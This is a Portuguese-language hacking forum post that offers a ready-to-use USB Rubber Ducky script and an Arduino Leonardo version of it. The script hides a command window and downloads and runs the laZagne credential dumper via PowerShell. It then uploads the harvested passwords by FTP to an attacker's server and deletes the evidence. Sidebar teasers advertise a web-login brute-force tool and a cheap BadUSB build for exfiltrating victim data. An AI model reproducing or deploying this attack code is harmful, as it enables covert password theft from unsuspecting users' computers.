Ir para conteúdo
Entre para seguir isso  
blackname

Script para obter passwords guardadas na Memória

Recommended Posts

Este script, poderá ser usado como o arduino leonardo (como usb rubber ducky), ou na USB Rubber Ducky da Hak5,  para obter passwords da memoria no sistema windows, utilizando o script python laZagne (https://github.com/AlessandroZ/LaZagne)

Script para USB Rubby Ducker (Substituir onde tem /////, pelas informações que pede, Host FTP, usuario, password)

REM Descobrir passwords browsers, pc
REM Script laZagne para windows
DELAY 1000
GUI r
STRING cmd
DELAY 300
ENTER
DELAY 500
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
DELAY 500
STRING powershell (new-object System.Net.WebClient).DownloadFile('https://cld.pt/dl/download/d8d3213c-aca4-495b-8089-84f25f9a569d/laZagne.exe?download=true','%TEMP%\laZagne.exe')
DELAY 300
ENTER
DELAY 7000
STRING %TEMP%\laZagne.exe all -oN
DELAY 300
ENTER
DELAY 4000
STRING cd results
DELAY 300
TAB
DELAY 300
ENTER
DELAY 300
STRING ftp
DELAY 300
ENTER
DELAY 100
STRING open
DELAY 300
ENTER
DELAY 100
STRING ///// Host FTP
DELAY 300
ENTER
DELAY 500
STRING ///// Usuário
DELAY 300
ENTER
DELAY 300
STRING ///// Palavra-Pass
DELAY 300
ENTER
DELAY 1000
STRING cd public_html
DELAY 300
ENTER
DELAY 300
STRING put *.txt
DELAY 300
ENTER
DELAY 1000
STRING quit
DELAY 300
ENTER
DELAY 300
STRING cd ..
DELAY 300
ENTER  
DELAY 300
STRING del results
DELAY 300
TAB
DELAY 300
ENTER
DELAY 300
STRING del %TEMP%\laZagne.exe
DELAY 300
ENTER
DELAY 300
STRING exit
DELAY 300
ENTER

Para Arduino Leonardo:

/*
 * Generated with <3 by Dckuino.js, an open source project !
 */

#include "Keyboard.h"

void typeKey(uint8_t key)
{
  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}

/* Init function */
void setup()
{
  // Begining the Keyboard stream
  Keyboard.begin();

  // Wait 500ms
  delay(500);

  // Descobrir passwords browsers, pc
  // Script laZagne para windows
  delay(1000);

  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  Keyboard.releaseAll();

  Keyboard.print(F("cmd"));

  delay(300);

  typeKey(KEY_RETURN);

  delay(500);

  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press(' ');
  Keyboard.releaseAll();

  Keyboard.print(F("M"));

  for(int i = 0; i < 100; i++) {
    typeKey(KEY_DOWN_ARROW);
  }

  typeKey(KEY_RETURN);

  delay(500);

  Keyboard.print(F("powershell (new-object System.Net.WebClient).DownloadFile('https://cld.pt/dl/download/d8d3213c-aca4-495b-8089-84f25f9a569d/laZagne.exe?download=true','%TEMP%\\laZagne.exe')"));

  delay(300);

  typeKey(KEY_RETURN);

  delay(7000);

  Keyboard.print(F("%TEMP%\\laZagne.exe all -oN"));

  delay(300);

  typeKey(KEY_RETURN);

  delay(4000);

  Keyboard.print(F("cd results"));

  delay(300);

  typeKey(KEY_TAB);

  delay(300);

  typeKey(KEY_RETURN);

  delay(300);

  Keyboard.print(F("ftp"));

  delay(300);

  typeKey(KEY_RETURN);

  delay(100);

  Keyboard.print(F("open"));

  delay(300);

  typeKey(KEY_RETURN);

  delay(100);

  Keyboard.print(F("///// Host FTP"));

  delay(300);

  typeKey(KEY_RETURN);

  delay(500);

  Keyboard.print(F("///// Usuário"));

  delay(300);

  typeKey(KEY_RETURN);

  delay(300);

  Keyboard.print(F("///// Palavra-Pass"));

  delay(300);

  typeKey(KEY_RETURN);

  delay(1000);

  Keyboard.print(F("cd public_html"));

  delay(300);

  typeKey(KEY_RETURN);

  delay(300);

  Keyboard.print(F("put *.txt"));

  delay(300);

  typeKey(KEY_RETURN);

  delay(1000);

  Keyboard.print(F("quit"));

  delay(300);

  typeKey(KEY_RETURN);

  delay(300);

  Keyboard.print(F("cd .."));

  delay(300);

  typeKey(KEY_RETURN);

  delay(300);

  Keyboard.print(F("del results"));

  delay(300);

  typeKey(KEY_TAB);

  delay(300);

  typeKey(KEY_RETURN);

  delay(300);

  Keyboard.print(F("del %TEMP%\\laZagne.exe"));

  delay(300);

  typeKey(KEY_RETURN);

  delay(300);

  Keyboard.print(F("exit"));

  delay(300);

  typeKey(KEY_RETURN);

  // Ending stream
  Keyboard.end();
}

/* Unused endless loop */
void loop() {}

Depois é so compilar para o respetivo.

Editado por blackname
  • Curtir 2
  • Valeu 1

Compartilhar este post


Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora
Entre para seguir isso  



  • Conteúdo Similar

    • Por Samuel Silva
      ForceD.py - Script para BruteForce em Páginas Web.

      Script para realizar ataque de BruteForce em páginas de administração Web.
      Instalação:
      $ sudo apt-get install python3 python3-pip; sudo pip3 install requests
      Download: ForceD.py Uso:
      $ python3 ForceD.py "http://www.exemplo.com/login.php" campoUsuario campoSenha "Mensagem de Erro" "usuario" wordlist
      OBS: Para realizar o ataque você deve saber o usuário da Vítima. OBS: A página que deve ser passada é a que o parâmetro action da tag form aponta.
    • Por Gabriel Santos
      [FERRAMENTA / CONTEÚDO]
      - Olá soldados! Apresento-lhes a minha ferramenta SCANNH-HEROS. A Ferramenta SCANNH HEROS foi feita com o intuito de automatizar e agilizar o seu Scanner de Portas de um determinado Site ou IP, podendo ser usada principalmente em um Pentest ágil, ou em outras diversas ocasiões. A ferramenta também lhe mostra uma LISTA de PROTOCOLOS e PORTAS, caso você não saiba qual o determinado "significado" de tal Porta Aberta.
      ( Espero que gostem! )
      LINK → https://goo.gl/dzSYVX
      LINK → https://goo.gl/dzSYVX
      LINK → https://goo.gl/dzSYVX
    • Por João Escobar
      O DARK_FILES está finalizado galera! 
      Ontem postei sobre ele no Facebook pedindo ajuda na questão da criptografia e, hoje, após um dia inteiro trabalhando nele consegui fazer uma criptografia FODA e finalizá-lo!
      Pra quem tiver interesse em conhecer:
      http://darkfiles.hk.tn/
      O QUE É:
      Hospedagem de arquivos 100% anônima (criptografia individual), limpa (sem anúncios/espera), segura e sem deixar rastros (server anon na Espanha, rs). Aqui seus arquivos 'dark' ficarão seguros.
      ~Por enquanto~ o upload máximo é 10MB, mas logo logo vai ser alterado pra mais. QUALQUER crítica/sugestão é muito bem vinda e vai ajudar muito.
      Fiz esse projeto pra estudo, com inspiração no antigo ObscuredFiles.
      Façam bom uso 
    • Por blackname
      Componentes Necessários:
      Arduino Micro (clone do original, mas como o mesmo micro-controlador) (http://bit.ly/2tehKz6) Transformador USB Male - Micro USB Male (http://ebay.to/2uq7DGS), escolher a opção "usb male-micro usb male" Uma case qualquer para dar um ar de pen Ferramentas Necessárias:
      Conversor de DuckyScript para arduino: https://nurrl.github.io/Duckuino/ Arduino IDE (não escolham a versão online): https://www.arduino.cc/en/main/software Exemplos de payloads da usb rubber ducky que podem ser convertidos: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads Como Fazer:
      Abrir a IDE do Arduino Criar ou converter um script pré-elaborado com a ferramenta duckuino Ligar o seu arduino a uma porta usb do compuntador, com aquele transformador, ou com um cabo usb Clicar na IDE na aba Ferramentas e caso não tenha sido identificado na placa "Arduino Leonardo", colocar, e depois selecionar a porta em que está conectado Clicar na setinha para compilar para o arduino, depois disto está pronto para utilizar noutro computador Coisas que serão diferentes:
      Este aqui não tera a opção de guardarmos os dados requisitados do computador da vitima no cartão de memoria, por isso teremos que optar por fazer o upload dos dados para algum servidor ftp (por exemplo 000webhost) Considerações Finais:
      Preço USB Rubber Ducky: 44.99$ Preço do arduino (clone) + transformador: 4.04$
    • Por EXT
      Estou entrando no  assunto, e vou colocar algumas apostilas que achei  aqui:
      Eletrogate
       Download 
      Vida de Silício (Sobre cada apostila)
      Vol.1 - Download
      Vol.2 - Download 
      Vol.3 - Download
      USP/Multilógica-Shop
      Download
      UFF
      Download
      Site BR 
      Arduino
×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.